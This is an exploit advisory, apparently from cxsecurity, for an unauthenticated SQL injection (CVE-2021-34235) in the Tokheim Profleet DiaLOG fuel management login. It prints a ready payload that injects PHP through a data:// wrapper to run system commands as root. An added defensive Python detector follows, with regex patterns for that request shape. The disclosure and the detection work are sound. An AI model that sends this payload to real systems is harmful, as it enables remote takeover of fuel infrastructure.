Tokheim Profleet DiaLOG Fuel Management System 11.005.02 SQL Injection / Code Execution

2022.02.12
Credit: golem445
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Tokheim Profleet DiaLOG Fuel Management System 11.005.02 - SQLi (Unauthenticated)
# Date: 02/9/2022
# Exploit Author: golem445
# Vendor Homepage: https://www.tsg-solutions.com
# Tested on: Kali Linux
# CVE: CVE-2021-34235

# Description:
The Field__UserLogin parameter is vulnerable to crafted MySQL injection, resulting in remote code execution as root.

==Steps to Reproduce==

# Go to : http://dialog_host/login.php
# Enter an escaped MySQL query into the username field and submit; the password doesn't matter. (Such as: ' /*!50000union*/ select 1,2,3,4,5,6,7,8,’data://text/plain,<?php $a=”sy”;$b=”stem”;$c=$a.$b; $c(“uname -a”);?>’ -- -)
# This can also be accomplished by intercepting the logon submission with Burp Proxy, then entering your MySQL query into the Field_UserLogin parameter.

==Notes==

This vulnerability appears to be rooted in a logic flaw. The typical authentication flow is: a user submits their credentials, authentication succeeds or fails, and the result is then noted in a log. This application appears to work inversely, i.e. the logon attempt is logged first, then the user's credentials are checked.
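For defenders, a detection check for the request shape described above, written as an added example that is not part of the original advisory or the vendor's code. It inspects a urlencoded login POST body, unwraps MySQL versioned comments such as /*!50000union*/ before matching, and reports which indicators the login field contains. The rule names, the sample bodies and the "pw" field are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Both spellings of the login field appear in the advisory text.
LOGIN_FIELDS = ("Field_UserLogin", "Field__UserLogin")

# MySQL executes the body of /*!NNNNN ... */, so unwrap it before matching.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)

RULES = {
    "union-select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "stream-wrapper": re.compile(r"\b(?:data|php|expect|phar)://", re.I),
    "sql-comment-tail": re.compile(r"(?:--[ \t]|#).*$"),
}

def normalize(value):
    """Unwrap versioned comments, drop plain ones, collapse whitespace."""
    value = VERSIONED.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()

def inspect_login_body(body):
    """Return the sorted rule names hit by the login field of a urlencoded POST body."""
    hits = set()
    fields = parse_qs(body, keep_blank_values=True)
    for name in LOGIN_FIELDS:
        for raw in fields.get(name, []):
            if "/*!" in raw:  # the obfuscation itself is an indicator
                hits.add("versioned-comment")
            text = normalize(raw)
            hits.update(rule for rule, rx in RULES.items() if rx.search(text))
    return sorted(hits)

# Constructed sample bodies (not captured traffic); "pw" is a placeholder field name.
SAMPLES = [
    "Field_UserLogin=j.smith&pw=x",
    "Field_UserLogin=%27+%2F*%2150000union*%2F+select+1%2C2%2C"
    "%27data%3A%2F%2Ftext%2Fplain%2Cx%27+--+-&pw=x",
    "Field__UserLogin=%27+union+all+select+1+%23&pw=x",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(inspect_login_body(body) or "clean", "<-", body)
```

Because the notes say the attempt is logged before credentials are checked, such a check belongs in front of the login handler (proxy or WAF), not behind authentication.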



Copyright 2022, cxsecurity.com